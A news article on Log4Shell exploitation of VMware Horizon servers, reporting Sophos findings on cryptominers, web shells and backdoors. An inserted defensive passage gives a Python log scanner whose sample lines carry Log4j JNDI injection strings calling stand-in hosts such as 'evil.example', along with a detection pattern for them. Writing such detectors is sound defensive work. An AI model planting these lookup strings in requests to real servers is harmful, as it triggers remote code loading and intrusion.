VMware Horizon platform pummeled by Log4j-fueled attacks

Miscreants deployed cryptominers, backdoors since late December, Sophos says

VMware's Horizon virtualization platform has become an ongoing target of attackers exploiting the high-profile Log4j flaw to install backdoors and cryptomining malware.

In a report this week, cybersecurity firm Sophos wrote that VMware's virtual desktop and applications platform has been in the crosshairs since late December, with the largest wave of attacks beginning Jan. 19 and continuing well into March. Many of the attacks are designed to deploy cryptocurrency mining malware, Sophos researchers Gabor Szappanos and Sean Gallagher wrote.

Other motives were less clear, though some may be used by ransomware groups or initial access brokers, who gain access into targeted systems and then sell that access to threat actors to launch ransomware and other malware attacks.

VMware released an updated version of Horizon in late December and has continued issuing Horizon patches this month for the Log4j flaw – called Log4Shell and tracked as CVE-2021-44228 – but the threat continues.

"Attempts to compromise Horizon servers are among the more targeted exploits of Log4Shell vulnerabilities because of their nature," the researchers wrote. "VMware has pushed out patched versions of Horizon as of March 8 2022, but many organizations may still not have deployed the fixed versions or applied workarounds to vulnerable ones. Even if they have, as demonstrated by the backdoors and reverse shell activity we found, those systems may already be compromised in other ways."

The Log4j critical flaw exploded onto the scene late last year, with cybercriminals moving in quickly to exploit the vulnerability.

The threat from Log4Shell is significant – Log4j has broad enterprise use in countless servers, cloud-based services and open-source projects like Elasticsearch and Elastic's Logstash.

The open-source logging library is so ubiquitous that it's difficult for organizations to track down every instance in their IT environments. Log4Shell is also easy to exploit, with attackers only needing to send a single crafted string to make their way into systems.

The attacks on Horizon also come as demand for such remote-work tools continues to grow in the wake of the COVID-19 pandemic, which forced most employees to work from home and has ushered in an expected era of more hybrid work.

"Organizations should thoroughly research their exposure to potential Log4J vulnerabilities, as they may impact commercial, open-source and custom software that in some cases may not have regular security support," Szappanos and Gallagher wrote. "But platforms such as Horizon are particularly attractive targets to all types of malicious actors because they are widespread and can (if still vulnerable) easily be found and exploited with well-tested tools."

According to Sophos, the attacks on VMware Horizon that started in January abused the Lightweight Directory Access Protocol (LDAP) lookup in Log4j to fetch a malicious Java class file that modified legitimate Java code on the server. That modification added a web shell that gave the attackers remote access and code execution.
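For defenders hunting for the lookup strings described above, here is an added example (not code from the article or the Sophos report) that scans Tomcat-style access log lines for a Log4j JNDI lookup and extracts the callback host so it can be blocked or correlated; the log lines, client and callback addresses are constructed.

```python
import re
from typing import Optional

# Constructed sample Tomcat-style access log lines (not taken from the article or any real server).
# The second and third lines carry a JNDI lookup in the User-Agent field, which Horizon logs.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Jan/2022:10:01:02 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [19/Jan/2022:10:01:07 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
203.0.113.9 - - [19/Jan/2022:10:02:11 +0000] "POST /broker/xml HTTP/1.1" 200 77 "-" "${JNDI:LDAPS://evil.example/x}"
"""

# A Log4j lookup using one of the remote schemes that can pull in a class file.
# Case-insensitive, because Log4j treats the prefix case-insensitively.
JNDI_RE = re.compile(r"\$\{\s*jndi:(ldaps?|rmi|dns)://([^/\s}]+)", re.IGNORECASE)


def find_jndi_lookup(line: str) -> Optional[dict]:
    """Return the scheme and callback host[:port] if the line carries a JNDI lookup, else None."""
    m = JNDI_RE.search(line)
    if not m:
        return None
    return {"scheme": m.group(1).lower(), "callback": m.group(2)}


def scan_access_log(text: str) -> list:
    """Walk an access log and collect one record per line that contains a JNDI lookup."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        found = find_jndi_lookup(line)
        if found:
            client = line.split(" ", 1)[0]  # first field of the combined log format is the client IP
            hits.append({"line": lineno, "client": client, **found})
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"line {hit['line']}: client {hit['client']} -> {hit['scheme']} callback {hit['callback']}")
```

Feed it the real access logs from a Horizon server's Tomcat instance; every callback host it reports is a candidate for egress blocking and for checking whether the server actually fetched a class from it.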

The initial attacks, in late December 2021 and January of this year, exploited the Log4j flaw to deploy Cobalt Strike. Other attackers didn't use reverse-shell software, instead directly targeting the Tomcat server inside Horizon.

Sophos said it had found a variety of payloads deployed to the targeted Horizon servers. Many were cryptominers, including z0Miner, JavaX miner and at least two variants of XMRig, called the "Jin" and "Mimu" miner bots.

"There were also several backdoors – including the Sliver implant, Atera agent and Splashtop Streamer (both legitimate software products being abused), and several PowerShell-based reverse shells," the researchers wrote.

"While z0Miner, JavaX, and some other payloads were downloaded directly by the web shells used for initial compromise, the Jin bots were tied to use of Sliver, and used the same wallets as Mimo – suggesting these three malware were used by the same actor."

There were also a number of backdoors deployed via the Log4j flaw, including some PowerShell reverse shells. The motives of the actors using the reverse shells were unclear. One Sophos customer was hit by both reverse shells and the Mimu miner, but the researchers said that could reflect multiple infections by different attackers, with the initial foothold established by an initial access broker.

Other cases showed more off-the-shelf backdoors being used to create a persistent presence in the targeted servers. That includes the Sliver implant, which the researchers described as an offensive security tool that was designed to be used by penetration testers and organizations' red teams for training by mirroring tactics used by cybercriminals. Instead, threat actors use the software in their attacks.

Casey Ellis, founder and CTO at Bugcrowd, told The Register that cryptominers were among the first malicious actors to exploit Log4Shell after it became public.

"It's a relatively simple and low-risk attack that works best with a large number of vulnerable endpoints in the attack surface," Ellis said. "Cybercriminals are businesses in their own right, and combining cryptomining as a criminal monetization technique with a vulnerable package and the ubiquity of Log4j makes perfect sense.

"The primary consequences for an organization are CPU resource shortages caused by mining activity and, for those using the cloud, an unexpectedly high usage bill."

In addition, because such attacks are simple to carry out, the threat actors using cryptomining range from individuals to ransomware-as-a-service gangs, initial access brokers and nation-states, which use cryptomining as a financing tool. ®
